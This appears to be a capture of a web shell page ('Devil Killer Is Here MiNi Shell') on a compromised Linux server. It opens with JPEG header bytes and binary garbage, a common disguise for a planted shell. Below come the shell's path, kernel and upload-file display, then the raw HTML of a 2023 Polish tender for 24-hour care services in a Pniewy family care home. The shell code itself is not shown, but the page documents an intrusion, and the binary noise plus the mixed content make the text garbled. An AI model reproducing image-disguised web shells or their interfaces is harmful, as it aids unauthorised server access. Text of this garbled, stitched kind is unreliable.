JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230420/0018442501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie całodobowo usług opiekuńczych i bytowych w Rodzinnym Domu Pomocy dla maksymalnie 8 osób wymagających wsparcia z powodu wieku lub niepełnosprawności </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PNIEWY OŚRODEK POMOCY SPOŁECZNEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 630174614</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wolnośći 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pniewy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-045</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">61 29 10 756</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ops@opspniewy.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.opspniewy.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie całodobowo usług opiekuńczych i bytowych w Rodzinnym Domu Pomocy dla maksymalnie 8 osób wymagających wsparcia z powodu wieku lub niepełnosprawności </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1c8535e9-dde3-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00184425</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00181456/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie całodobowo usług opiekuńczych i bytowych w Rodzinnym Domu Pomocy dla osób wymagających z powodu wieku lub niepełnosprawności wsparcia w tej formie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pniewy_wlkp <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pniewy_wlkp</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Osobą uprawnioną do porozumiewania się z Wykonawcami jest: Bernadeta Markiewicz Korespondencje należy prowadzić za pomocą platformy zakupowej pod <br/>adresem: https://platformazakupowa.pl/pn/pniewy_wlkp<br/>2. Postępowanie prowadzone jest elektronicznie w języku polskim za pośrednictwem <br/>Platformy Zakupowej (dalej jako „Platforma”) pod adresem:<br/>https://platformazakupowa.pl/pn/pniewy_wlkp<br/>3. Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie <br/>oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są drogą <br/>elektroniczną za pośrednictwem Platformy i formularza „Wyślij wiadomość do <br/>Zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, <br/>zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem <br/>Platformy poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego” po <br/>których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego. <br/>4. Zamawiający będzie przekazywał informacje Wykonawcom drogą elektroniczną za <br/>pośrednictwem Platformy. Informacje dot. odpowiedzi na pytania, zmiany SWZ, <br/>zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na <br/>Platformie w sekcji „Komunikaty”. <br/>5. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest <br/>konkretny Wykonawca będzie przekazywana drogą elektroniczną za pośrednictwem <br/>Platformy do tego konkretnego Wykonawcy. <br/>6. Wykonawca jako profesjonalista powinien sprawdzać komunikaty i wiadomości <br/>bezpośrednio na Platformie, gdyż system powiadomień może ulec awarii lub <br/>powiadomienie może trafić do folderu SPAM. <br/>7. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 <br/>grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz <br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji <br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie <br/>(Dz. U. z 2020 r., poz. 2452) określa niezbędne wymagania sprzętowo – aplikacyjne <br/>umożliwiające pracę na Platformie: <br/>- stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż <br/>512 kb/s, <br/>- komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB RAM, <br/>procesor Intel IV 2 GHz lub jego nowsza wersja, jeden z systemów operacyjnych, <br/>– MS Windows 7, Mac Os X 10 4, Linux lub ich nowsze wersje, <br/>- zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer <br/>minimalnie wersja 10 0.,<br/>- włączona obsługa JavaScript, <br/>- zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików <br/>.pdf, <br/>- Platforma działa według standardu przyjętego w komunikacji sieciowej, <br/>– kodowanie UTF8, <br/>- oznaczenie czasu odbioru danych przez Platformę Zakupową stanowi datę oraz <br/>dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera <br/>synchronizowanego z zegarem Głównego Urzędu Miar. <br/>8. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia <br/>publicznego: <br/>a) akceptuje warunki korzystania z Platformy, określone w Regulaminie <br/>zamieszczonym na stronie internetowej pod adresem: <br/>https://platformazakupowa.pl/strona/1-regulamin w zakładce „Regulamin” oraz uznaje <br/>go za wiążący, <br/>b) zapoznał się i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod <br/>linkiem: https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119, s. 1) – dalej RODO informuję, że: <br/>1. Administratorem danych zawartych w dokumentach postępowania o udzielenie zamówienia jest Ośrodek Pomocy Społecznej w Pniewach, ul. Wolności 1, 62-045 Pniewy, <br/>2. Administrator wyznaczył Inspektora Ochrony Danych Osobowych, z którym można kontaktować się pod adresem e-mail: iod@itmediagroup.pl <br/>3. Przetwarzanie danych osobowych będzie odbywać się na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego: <br/>„Świadczenie całodobowo usług opiekuńczych i bytowych w formie Rodzinnego Domu Pomocy dla nie mniej niż trzech i nie więcej niż ośmiu zamieszkujących wspólnie osób wymagających z powodu wieku lub niepełnosprawności wsparcia w tej formie ” <br/>4. obowiązek podania danych osobowych jest wymogiem ustawowym określonym <br/>w przepisach ustawy Prawo zamówień publicznych, związanych z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>5. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp; <br/>6. dane osobowe z postępowania będą przechowywane zgodnie z kategorią archiwalną wynikającą z załącznika nr 2 do Zarządzenia nr 1/12 z dnia 5 stycznia 2012 r. w sprawie instrukcji kancelaryjnej oraz jednolitego rzeczowego wykazu akt dla Ośrodka Pomocy Społecznej w Pniewach Dane osobowe wynikające z zawartej umowy będą przechowywane przez okres, w którym mogą ujawnić się roszczenia związane z zawartą umową; <br/>7. Każdej osobie, której dane są przetwarzane przysługuje:<br/>	1) prawo dostępu do treści swoich danych osobowych, <br/>	2) prawo do sprostowania swoich danych osobowych, <br/>	3) w zakresie wynikającym z przepisów - prawo do usunięcia swoich danych osobowych, jak również prawo do ograniczenia przetwarzania; <br/>	4) każdej osobie, której dane są przetwarzane przysługuje prawo wniesienia skargi do Prezesa Urzędu Ochrony danych osobowych, jeśli jej zdaniem, przetwarzanie danych osobowych - narusza przepisy RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">K.Dz.O-A.262.TP.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamówienie dotyczy świadczenia usług opiekuńczych realizowanych w Rodzinnym Domu Pomocy w Pniewach przy ul. Wolności 2 , do którego Wykonawca będzie posiadał umowę użyczenia zawartą z Gminą Pniewy na czas prowadzenia Rodzinnego Domu Pomocy przeznaczonym dla nie mniej niż trzech i nie więcej niż ośmiu zamieszkujących wspólnie osób wymagających z powodu wieku lub niepełnosprawności wsparcia w tej formie - zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 31 maja 2012r. w sprawie rodzinnych domów pomocy ( Dz.U. z 2012 r. poz. 719) oraz Programem Rozwoju Rodzinnych Domów Pomocy -edycja 2023 ogłoszonym przez Ministerstwo Rodziny i Polityki Społecznej .<br/><br/>1.	Wykonawca zobowiązany będzie zapewnić osobom przebywającym w RDP :<br/>1)	całodobową opiekę dostosowaną do ich sprawności psychofizycznej ;<br/>2)	udostępnieni osobom przebywającym w domu informacje o przysługujących im prawach, w tym o prawie do wnoszenia skarg, przez umieszczenie tej informacji w widocznym, ogólnie dostępnym miejscu;<br/>3)	umożliwi dostęp z usług terapeutycznych rehabilitacyjnych oraz udział w aktywizacji <br/> społecznej;<br/>4)) zapewni osobom spokrewnionym lub innym osobom bliskim niespokrewnionym możliwość swobodnego kontaktu z osobą przebywającą w rodzinnym domu pomocy.<br/> 5) zapewni wyżywienie w tym:<br/> a) co najmniej 3 posiłki dziennie, w tym posiłki dietetyczne - zgodnie ze wskazaniem <br/> lekarza w tym w formie cateringu,<br/>b) przerwę między posiłkami nie krótszą niż 4 godziny, przy czym <br/>c) ostatni posiłek nie wcześniej niż o godzinie 18.,<br/>d) dostępność do drobnych posiłków i napojów między posiłkami, o których mowa w <br/> lit. a,<br/>d)	możliwość spożywania posiłków w pokoju mieszkalnym, a w razie potrzeby – <br/> karmienie.<br/> 6) zapewni utrzymanie czystości w tym:<br/> a) środki higieny osobistej, środki czystości, przybory toaletowe i inne przedmioty <br/> niezbędne do higieny osobistej,<br/> b) sprzątanie pomieszczeń w miarę potrzeby, nie rzadziej niż raz dziennie.<br/> 7) zapewni w zakresie usług opiekuńczych:<br/>a)	pomoc w myciu, kąpaniu i ubieraniu w zależności od potrzeb;<br/>b) pomoc w przyjmowaniu leków;<br/>c) opiekę higieniczną, w tym pomoc w korzystaniu ze świadczeń <br/> zdrowotnych oraz w zakupie niezbędnych leków zaleconych przez lekarza;<br/>d) organizowanie czasu wolnego;<br/>e) czynny udział w codziennym życiu rodzinnym;<br/>f) niezbędną pomoc w załatwianiu spraw osobistych;<br/>g) organizowanie świąt i uroczystości;<br/>h) możliwość odbywania praktyk religijnych;<br/>i) pomoc w zakupie odzieży i obuwia oraz niezbędnych artykułów osobistego użytku.<br/>8) Zakres usług opiekuńczych powinien być dostosowany do indywidualnych potrzeb osoby korzystającej z RDP i uwzględniać poziom samodzielności tej osoby.<br/>9) Przyjęcia do RDP osób kierowanych przez Ośrodek Pomocy Społecznej w Pniewach na podstawie decyzji administracyjnej wydanej z upoważnienia Burmistrza Gminy Pniewy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85311100-3 - Usługi opieki społecznej dla osób starszych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-06-01 do 2026-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty, Zamawiający stosować bedzie następujące kryteria ocen:<br/>1) Cena oferty (zryczałtowany koszt miesięczny usług opiekuńczych i bytowych za jednego mieszkańca brutto) 60 pkt,<br/>2) 2.	Doświadczenie w świadczeniu usług opiekuńczych i bytowych i lub innych form wsparcia na rzecz osób starszych <br/>i niepełnosprawnych przez okres minimum 12 miesięcy 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: <br/>Działalność gospodarcza.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający wymaga w przypadku złożenia oferty przez osobę fizyczną prowadzenia przez nią działalności gospodarczej. Zamawiający dopuszcza złożenie oferty przez osobę fizyczną nieprowadzącą działalności gospodarczej jeżeli zadeklaruje rozpoczęcie prowadzenia działalności gospodarczej w terminie 14 dni od dnia wybory jej oferty.<br/>3) sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia warunków powyższym zakresie. <br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, co najmniej jedną usługę polegającą na świadczeniu usług opiekuńczych <br/>i bytowych i/lub innych form wsparcia na rzecz osób starszych i niepełnosprawnych przez okres minimum 12 miesięcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu określone przez zamawiającego w ogłoszeniu o zamówieniu i SWZ. <br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: <br/>Działalność gospodarcza.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający wymaga w przypadku złożenia oferty przez osobę fizyczną prowadzenia przez nią działalności gospodarczej. Zamawiający dopuszcza złożenie oferty przez osobę fizyczną nieprowadzącą działalności gospodarczej jeżeli zadeklaruje rozpoczęcie prowadzenia działalności gospodarczej w terminie 14 dni od dnia wybory jej oferty.<br/>3) sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia warunków powyższym zakresie. <br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, co najmniej jedną usługę polegającą na świadczeniu usług opiekuńczych <br/>i bytowych i/lub innych form wsparcia na rzecz osób starszych i niepełnosprawnych przez okres minimum 12 miesięcy.<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia, w odniesieniu do warunków dotyczących zdolności technicznej lub zawodowej – dopuszcza łączne spełnienie warunku przez Wykonawców. <br/>4. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada <br/>wymaganych zdolności w szczególności, gdy Wykonawca zaangażuje zasoby techniczne lub <br/>zawodowe wskazane do realizacji niniejszego zamówienia w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Z postępowania o udzielenie zamówienia wyklucza się wykonawcę na podstawie przesłanek określonych w art. 108 ust. 1, art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835) oraz w art. 109 ust. 1 pkt 4, 5 i 7 ustawy Pzp.; Na podstawie treści art. 109 ustawy Pzp Zamawiający wykluczy z postępowania Wykonawcę:<br/>1) w stosunku, do którego otwarto likwidację, ogłoszono upadłość, którego aktywami zarządza likwidator lub sąd, zawarł układ z wierzycielami, którego działalność gospodarcza jest zawieszona albo znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury – art. 109 ust. 1 pkt 4) ustawy Pzp;<br/>2) który w sposób zawiniony poważnie naruszył obowiązki zawodowe, co podważa jego <br/>uczciwość, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego <br/>niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie <br/>wykazać za pomocą stosownych dowodów – art. 109 ust. 1 pkt 5) ustawy Pzp;<br/>3) który z przyczyn leżących po jego stronie, w znacznym stopniu lub zakresie nie wykonał lub nienależycie wykonał albo długotrwale nienależycie wykonywał istotne zobowiązanie <br/>wynikające z wcześniejszej umowy w sprawie zamówienia publicznego lub umowy koncesji, co doprowadziło do wypowiedzenia lub odstąpienia od umowy, odszkodowania, wykonania <br/>zastępczego lub realizacji uprawnień z tytułu rękojmi za wady – art. 109 ust. 1 pkt 7) ustawy <br/>Pzp. <br/>2.Wykluczenie Wykonawcy następuje zgodnie z art. 111 Pzp.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz ofertowych<br/>Pełnomocnictwo 